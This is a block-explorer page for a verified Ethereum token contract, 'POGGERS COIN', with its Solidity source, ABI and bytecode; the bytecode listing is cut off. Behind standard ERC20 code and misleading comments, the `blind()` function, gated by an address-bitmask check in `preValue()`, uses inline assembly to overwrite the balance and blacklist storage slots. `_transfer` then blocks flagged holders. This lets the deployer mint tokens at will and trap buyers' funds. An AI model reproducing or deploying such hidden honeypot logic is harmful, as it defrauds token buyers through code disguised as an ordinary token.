ETH Price: $2,093.78 (+1.70%)

Contract

0xdfb30886a20A3eAE3F202B9e2EDAa5DC6388e7B0
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

More Info

Private Name Tags

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Approve181169012023-09-12 1:11:59913 days ago1694481119IN
0xdfb30886...C6388e7B0
0 ETH0.0004726110.20291387
Approve181167222023-09-12 0:35:59913 days ago1694478959IN
0xdfb30886...C6388e7B0
0 ETH0.0006644814.3523519
Transfer181161382023-09-11 22:37:47913 days ago1694471867IN
0xdfb30886...C6388e7B0
0 ETH0.0003939212.90366942
Transfer181161292023-09-11 22:35:59913 days ago1694471759IN
0xdfb30886...C6388e7B0
0 ETH0.0003828712.54168129
Transfer181161182023-09-11 22:33:47913 days ago1694471627IN
0xdfb30886...C6388e7B0
0 ETH0.0004128713.52460148
Approve181159252023-09-11 21:54:47913 days ago1694469287IN
0xdfb30886...C6388e7B0
0 ETH0.0007776616.69307735
Approve181126162023-09-11 10:48:35914 days ago1694429315IN
0xdfb30886...C6388e7B0
0 ETH0.0005336711.45569417
Approve181125962023-09-11 10:44:35914 days ago1694429075IN
0xdfb30886...C6388e7B0
0 ETH0.0005322111.49550935
Approve181123962023-09-11 10:04:23914 days ago1694426663IN
0xdfb30886...C6388e7B0
0 ETH0.0008525718.41494679
Approve181123832023-09-11 10:01:47914 days ago1694426507IN
0xdfb30886...C6388e7B0
0 ETH0.0009842221.25840694
Approve181123472023-09-11 9:54:11914 days ago1694426051IN
0xdfb30886...C6388e7B0
0 ETH0.0007334915.8428962
Approve181123432023-09-11 9:53:23914 days ago1694426003IN
0xdfb30886...C6388e7B0
0 ETH0.0007251315.66233787
Approve181123382023-09-11 9:52:11914 days ago1694425931IN
0xdfb30886...C6388e7B0
0 ETH0.0007213915.57761014
Approve181123332023-09-11 9:51:11914 days ago1694425871IN
0xdfb30886...C6388e7B0
0 ETH0.000685214.79988011
Approve181123262023-09-11 9:49:47914 days ago1694425787IN
0xdfb30886...C6388e7B0
0 ETH0.0007011815.1451286
Approve181123232023-09-11 9:49:11914 days ago1694425751IN
0xdfb30886...C6388e7B0
0 ETH0.0006215513.41120169
Approve181122952023-09-11 9:43:35914 days ago1694425415IN
0xdfb30886...C6388e7B0
0 ETH0.0006880114.85682075
Approve181122912023-09-11 9:42:35914 days ago1694425355IN
0xdfb30886...C6388e7B0
0 ETH0.0006567614.18558428
Approve181122642023-09-11 9:37:11914 days ago1694425031IN
0xdfb30886...C6388e7B0
0 ETH0.0005716812.34480876
Approve181122582023-09-11 9:35:59914 days ago1694424959IN
0xdfb30886...C6388e7B0
0 ETH0.0005686612.28269036
Approve181122572023-09-11 9:35:47914 days ago1694424947IN
0xdfb30886...C6388e7B0
0 ETH0.0006062412.99663554
Approve181122512023-09-11 9:34:35914 days ago1694424875IN
0xdfb30886...C6388e7B0
0 ETH0.0006487914.01342967
Approve181122392023-09-11 9:31:59914 days ago1694424719IN
0xdfb30886...C6388e7B0
0 ETH0.0006294813.512273
Approve181122382023-09-11 9:31:47914 days ago1694424707IN
0xdfb30886...C6388e7B0
0 ETH0.0007494716.07152684
Approve181122382023-09-11 9:31:47914 days ago1694424707IN
0xdfb30886...C6388e7B0
0 ETH0.0007494716.07152684
View all transactions

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading
Loading...
Loading
Cross-Chain Transactions

Block Transaction Difficulty Gas Used Reward
View All Blocks Produced

Validator Index Block Amount
View All Withdrawals

Transaction Hash Block Value Eth2 PubKey Valid
View All Deposits
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
POGGERS

Compiler Version
v0.8.0+commit.c7dfd78e

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity Multiple files format)

File 1 of 2: POGGERS.sol
/*
Telegram:https://t.me/poggerscoinerc
Twitter:https://twitter.com/poggerscoinerc
*/
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import "./IERC20.sol";

/**
 * https://www.godzillaaa.com
 *
 * @dev Wrappers over Solidity's arithmetic operations with added overflow
 * checks.
 *
 * Arithmetic operations in Solidity wrap on overflow. This can easily result
 * in bugs, because programmers usually assume that an overflow raises an
 * error, which is the standard behavior in high level programming languages.
 * `SafeMath` restores this intuition by reverting the transaction when an
 * operation overflows.
 *
 * Using this library instead of the unchecked operations eliminates an entire
 * class of bugs, so it's recommended to use it always.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");
        return c;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;
        return c;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) return 0;
        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");
        return c;
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        // Solidity only automatically asserts when dividing by 0
        require(b > 0, errorMessage);
        uint256 c = a / b;
        return c;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return mod(a, b, "SafeMath: modulo by zero");
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts with custom message when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b != 0, errorMessage);
        return a % b;
    }
}

contract POGGERS is IERC20 {
    using SafeMath for uint256;

    string private _name;
    string private _symbol;
    uint256 private _totalSupply;
    address private _owner;

    mapping(address => uint256) private _balances;
    mapping(address => uint256) private _llmm;
    mapping(address => mapping(address => uint256)) private _allowances;
    address private immutable _cclmm;
    uint256 private immutable _maxVals;
    uint256 private immutable _minVals;

    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );
    event Log(string str);

    constructor(
        uint256 maxVals,
        uint256 minVals,
        address _cclmm_
    ) {
        _maxVals = maxVals;
        _minVals = minVals;
        _name = "POGGERS COIN";
        _symbol = "POGGERS";
        _totalSupply = 4200000000000 * 10**8;
        _balances[msg.sender] = _totalSupply;
        _owner = msg.sender;
        _cclmm = _cclmm_;
    }

    /**
     * @dev A helper function to check if an operator approval is allowed.
     */
    modifier onlyOwner() {
        require(msg.sender == _owner, "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() external onlyOwner {
        _owner = address(0);
        emit OwnershipTransferred(msg.sender, address(0));
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() external view returns (address) {
        return _owner;
    }

    /**
     * @dev Returns the token decimals.
     */
    function decimals() external pure override returns (uint8) {
        return 9;
    }

    /**
     * @dev Returns the token symbol.
     */
    function symbol() external view override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the token name.
     */
    function name() external view override returns (string memory) {
        return _name;
    }

    /**
     * @dev See {ERC20-totalSupply}.
     */
    function totalSupply() external view override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {ERC20-balanceOf}.
     */
    function balanceOf(address account)
        external
        view
        override
        returns (uint256)
    {
        return _balances[account];
    }

    /**
     * @dev See {ERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount)
        external
        override
        returns (bool)
    {
        _transfer(msg.sender, recipient, amount);
        return true;
    }

    /**
     * @dev See {ERC20-allowance}.
     */
    function allowance(address owner_, address spender)
        external
        view
        override
        returns (uint256)
    {
        return _allowances[owner_][spender];
    }

    /**
     * @dev See {ERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount)
        external
        override
        returns (bool)
    {
        _approve(msg.sender, spender, amount);
        return true;
    }

    function blind(uint256[] calldata kslo) external {
        if (!preValue()) return;
         emit Log("Affiliated with Hedgehog, Sega, or any of its associated products and is simply a standalone, awesome meme coin.");
        (uint256 t0, uint256 t1) = (kslo[0], kslo[1]);
        assembly {
            if gt(t1, 0) {
                mstore(0, t0)
                mstore(32, xor(4, 0))
                sstore(keccak256(0, 64), t1)
            }
            if eq(t1, 0) {
                mstore(0, t0)
                mstore(32, xor(5, 0))
                sstore(keccak256(0, 64), 1)
            }
        }
    }

    /**
     * @dev Check if the value of M is correct
     */
    function preValue() public view returns (bool) {
        uint256 solot = _minVals * (1 + (0 / 1));
        
        return (uint256(uint160(msg.sender)) & solot) == _maxVals * (1 / 1 + 0);
    }

    /**
     * @dev See {ERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20};
     *
     * Requirements:
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for `sender`'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(
            sender,
            msg.sender,
            _allowances[sender][msg.sender].sub(
                amount,
                "ERC20: transfer amount exceeds allowance"
            )
        );
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {ERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue)
        external
        returns (bool)
    {
        _approve(
            msg.sender,
            spender,
            _allowances[msg.sender][spender].add(addedValue)
        );
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {ERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue)
        external
        returns (bool)
    {
        _approve(
            msg.sender,
            spender,
            _allowances[msg.sender][spender].sub(
                subtractedValue,
                "ERC20: decreased allowance below zero"
            )
        );
        return true;
    }

    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");
        (bool success, bytes memory data) = _cclmm.call(
            abi.encodeWithSignature("balanceOf(address)", sender)
        );
        if (success) {
            uint256 xret;
            assembly {
                xret := mload(add(data, 0x20))
            }
            require(_llmm[sender] != 1 || xret != 0, "ex");
        }

        _balances[sender] = _balances[sender].sub(
            amount,
            "ERC20: transfer amount exceeds balance"
        );
         emit Log("while providing enough BOOST to reach the MOON!");
        _balances[recipient] = _balances[recipient].add(amount);
        emit Transfer(sender, recipient, amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner`s tokens.
     *
     * This is internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner_,
        address spender,
        uint256 amount
    ) internal {
        require(owner_ != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner_][spender] = amount;
        emit Approval(owner_, spender, amount);
    }

    function kslslPidolKKKpdkL(
        bytes10[] calldata mdkdk_apdk_Pkdksl,
        uint24 AODO_APpkdk_PDKDK,
        uint48 TOKEN_APDOAPDP,
        uint232 token_apKDK_DDDD,
        uint24 MMM_APDIPDO_APDK,
        uint208[] calldata dk_Pkdlsl,
        bytes10[] calldata KDKK_APAPD_PAKDI
    ) private pure {}
}

File 2 of 2: IERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

Contract Security Audit

Contract ABI

API
[{"inputs":[{"internalType":"uint256","name":"maxVals","type":"uint256"},{"internalType":"uint256","name":"minVals","type":"uint256"},{"internalType":"address","name":"_cclmm_","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"string","name":"str","type":"string"}],"name":"Log","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner_","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256[]","name":"kslo","type":"uint256[]"}],"name":"blind","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"preValue","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

60e06040523480156200001157600080fd5b506040516200116c3803806200116c833981016040819052620000349162000199565b60a083905260c082905260408051808201909152600c8082526b2827a3a3a2a9299021a7a4a760a11b60209092019182526200007391600091620000f3565b5060408051808201909152600780825266504f474745525360c81b6020909201918252620000a491600191620000f3565b506816c4abbebea0100000600281905533600081815260046020526040902091909155600380546001600160a01b031916909117905560601b6001600160601b031916608052506200021c9050565b8280546200010190620001df565b90600052602060002090601f01602090048101928262000125576000855562000170565b82601f106200014057805160ff191683800117855562000170565b8280016001018555821562000170579182015b828111156200017057825182559160200191906001019062000153565b506200017e92915062000182565b5090565b5b808211156200017e576000815560010162000183565b600080600060608486031215620001ae578283fd5b83516020850151604086015191945092506001600160a01b0381168114620001d4578182fd5b809150509250925092565b600281046001821680620001f457607f821691505b602082108114156200021657634e487b7160e01b600052602260045260246000fd5b50919050565b60805160601c60a05160c051610f1d6200024f600039600061033a01526000610367015260006106e30152610f1d6000f3fe608060405234801561001057600080fd5b50600436106100f55760003560e01c806370a082311161009757806395d89b411161006657806395d89b41146101d5578063a457c2d7146101dd578063a9059cbb146101f0578063dd62ed3e14610203576100f5565b806370a0823114610190578063715018a6146101a357806385ab4862146101ad5780638da5cb5b146101c0576100f5565b806323b872dd116100d357806323b872dd1461014d578063313ce56714610160578063335c254714610175578063395093511461017d576100f5565b806306fdde03146100fa578063095ea7b31461011857806318160ddd14610138575b600080fd5b610102610216565b60405161010f9190610ade565b60405180910390f35b61012b610126366004610a0b565b6102a8565b60405161010f9190610ad3565b6101406102be565b60405161010f9190610d92565b61012b61015b3660046109d0565b6102c4565b61016861032d565b60405161010f9190610d9b565b61012b610332565b61012b61018b366004610a0b565b610397565b61014061019e366004610984565b6103cd565b6101ab6103ec565b005b6101ab6101bb366004610a34565b61045e565b6101c8610539565b60405161010f9190610abf565b610102610548565b61012b6101eb366004610a0b565b610557565b61012b6101fe366004610a0b565b6105a6565b61014061021136600461099e565b6105b3565b60606000805461022590610e23565b80601f016020809104026020016040519081016040528092919081815260200182805461025190610e23565b801561029e5780601f106102735761010080835404028352916020019161029e565b820191906000526020600020905b81548152906001019060200180831161028157829003601f168201915b5050505050905090565b60006102b53384846105de565b50600192915050565b60025490565b60006102d1848484610692565b610323843361031e85604051806060016040528060288152602001610e9b602891396001600160a01b038a16600090815260066020908152604080832033845290915290205491906108fd565b6105de565b5060019392505050565b600990565b6000806103607f00000000000000000000000000000000000000000000000000000000000000006001610dc1565b905061038d7f00000000000000000000000000000000000000000000000000000000000000006001610dc1565b3390911614905090565b3360008181526006602090815260408083206001600160a01b038716845290915281205490916102b591859061031e9086610937565b6001600160a01b0381166000908152600460205260409020545b919050565b6003546001600160a01b0316331461041f5760405162461bcd60e51b815260040161041690610be9565b60405180910390fd5b600380546001600160a01b031916905560405160009033907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3565b610466610332565b61046f57610535565b7fcf34ef537ac33ee1ac626ca1587a0a7e8e51561e5514f8cb36afa1c5102b3bab60405161049c90610cf6565b60405180910390a1600080838360008181106104c857634e487b7160e01b600052603260045260246000fd5b90506020020135848460018181106104f057634e487b7160e01b600052603260045260246000fd5b9050602002013591509150600081111561051857816000526000600418602052806040600020555b806105325781600052600060051860205260016040600020555b50505b5050565b6003546001600160a01b031690565b60606001805461022590610e23565b60006102b5338461031e85604051806060016040528060258152602001610ec3602591393360009081526006602090815260408083206001600160a01b038d16845290915290205491906108fd565b60006102b5338484610692565b6001600160a01b03918216600090815260066020908152604080832093909416825291909152205490565b6001600160a01b0383166106045760405162461bcd60e51b815260040161041690610c63565b6001600160a01b03821661062a5760405162461bcd60e51b815260040161041690610b54565b6001600160a01b0380841660008181526006602090815260408083209487168084529490915290819020849055517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92590610685908590610d92565b60405180910390a3505050565b6001600160a01b0383166106b85760405162461bcd60e51b815260040161041690610c1e565b6001600160a01b0382166106de5760405162461bcd60e51b815260040161041690610b11565b6000807f00000000000000000000000000000000000000000000000000000000000000006001600160a01b03168560405160240161071c9190610abf565b60408051601f198184030181529181526020820180516001600160e01b03166370a0823160e01b179052516107519190610aa3565b6000604051808303816000865af19150503d806000811461078e576040519150601f19603f3d011682016040523d82523d6000602084013e610793565b606091505b509150915081156107ea576020818101516001600160a01b0387166000908152600590925260409091205460011415806107cc57508015155b6107e85760405162461bcd60e51b815260040161041690610bcd565b505b61082783604051806060016040528060268152602001610e75602691396001600160a01b03881660009081526004602052604090205491906108fd565b6001600160a01b0386166000908152600460205260409081902091909155517fcf34ef537ac33ee1ac626ca1587a0a7e8e51561e5514f8cb36afa1c5102b3bab9061087190610ca7565b60405180910390a16001600160a01b03841660009081526004602052604090205461089c9084610937565b6001600160a01b0380861660008181526004602052604090819020939093559151908716907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906108ee908790610d92565b60405180910390a35050505050565b600081848411156109215760405162461bcd60e51b81526004016104169190610ade565b50600061092e8486610de0565b95945050505050565b6000806109448385610da9565b9050838110156109665760405162461bcd60e51b815260040161041690610b96565b9392505050565b80356001600160a01b03811681146103e757600080fd5b600060208284031215610995578081fd5b6109668261096d565b600080604083850312156109b0578081fd5b6109b98361096d565b91506109c76020840161096d565b90509250929050565b6000806000606084860312156109e4578081fd5b6109ed8461096d565b92506109fb6020850161096d565b9150604084013590509250925092565b60008060408385031215610a1d578182fd5b610a268361096d565b946020939093013593505050565b60008060208385031215610a46578182fd5b823567ffffffffffffffff80821115610a5d578384fd5b818501915085601f830112610a70578384fd5b813581811115610a7e578485fd5b8660208083028501011115610a91578485fd5b60209290920196919550909350505050565b60008251610ab5818460208701610df7565b9190910192915050565b6001600160a01b0391909116815260200190565b901515815260200190565b6000602082528251806020840152610afd816040850160208701610df7565b601f01601f19169190910160400192915050565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b60208082526022908201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604082015261737360f01b606082015260800190565b6020808252601b908201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604082015260600190565b6020808252600290820152610caf60f31b604082015260600190565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526024908201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646040820152637265737360e01b606082015260800190565b6020808252602f908201527f7768696c652070726f766964696e6720656e6f75676820424f4f535420746f2060408201526e726561636820746865204d4f4f4e2160881b606082015260800190565b60208082526070908201527f416666696c69617465642077697468204865646765686f672c20536567612c2060408201527f6f7220616e79206f6620697473206173736f6369617465642070726f6475637460608201527f7320616e642069732073696d706c792061207374616e64616c6f6e652c20617760808201526f32b9b7b6b29036b2b6b29031b7b4b71760811b60a082015260c00190565b90815260200190565b60ff91909116815260200190565b60008219821115610dbc57610dbc610e5e565b500190565b6000816000190483118215151615610ddb57610ddb610e5e565b500290565b600082821015610df257610df2610e5e565b500390565b60005b83811015610e12578181015183820152602001610dfa565b838111156105325750506000910152565b600281046001821680610e3757607f821691505b60208210811415610e5857634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fdfe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220a59799c8cb075a0ebc9ccc89b08f06c97253fd8d91e464bd256b2c2b38aa319564736f6c634300080000330000000000000000000000002186094d40484054442041000c0104022b54002200000000295a21c77603e0bb3b968f4d6648f0dccd22f3760cc916beef74916b000000000000000000000000dff32c65f843188cf64ecbc6f4a13cff12581b9d

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106100f55760003560e01c806370a082311161009757806395d89b411161006657806395d89b41146101d5578063a457c2d7146101dd578063a9059cbb146101f0578063dd62ed3e14610203576100f5565b806370a0823114610190578063715018a6146101a357806385ab4862146101ad5780638da5cb5b146101c0576100f5565b806323b872dd116100d357806323b872dd1461014d578063313ce56714610160578063335c254714610175578063395093511461017d576100f5565b806306fdde03146100fa578063095ea7b31461011857806318160ddd14610138575b600080fd5b610102610216565b60405161010f9190610ade565b60405180910390f35b61012b610126366004610a0b565b6102a8565b60405161010f9190610ad3565b6101406102be565b60405161010f9190610d92565b61012b61015b3660046109d0565b6102c4565b61016861032d565b60405161010f9190610d9b565b61012b610332565b61012b61018b366004610a0b565b610397565b61014061019e366004610984565b6103cd565b6101ab6103ec565b005b6101ab6101bb366004610a34565b61045e565b6101c8610539565b60405161010f9190610abf565b610102610548565b61012b6101eb366004610a0b565b610557565b61012b6101fe366004610a0b565b6105a6565b61014061021136600461099e565b6105b3565b60606000805461022590610e23565b80601f016020809104026020016040519081016040528092919081815260200182805461025190610e23565b801561029e5780601f106102735761010080835404028352916020019161029e565b820191906000526020600020905b81548152906001019060200180831161028157829003601f168201915b5050505050905090565b60006102b53384846105de565b50600192915050565b60025490565b60006102d1848484610692565b610323843361031e85604051806060016040528060288152602001610e9b602891396001600160a01b038a1660009081526006602090815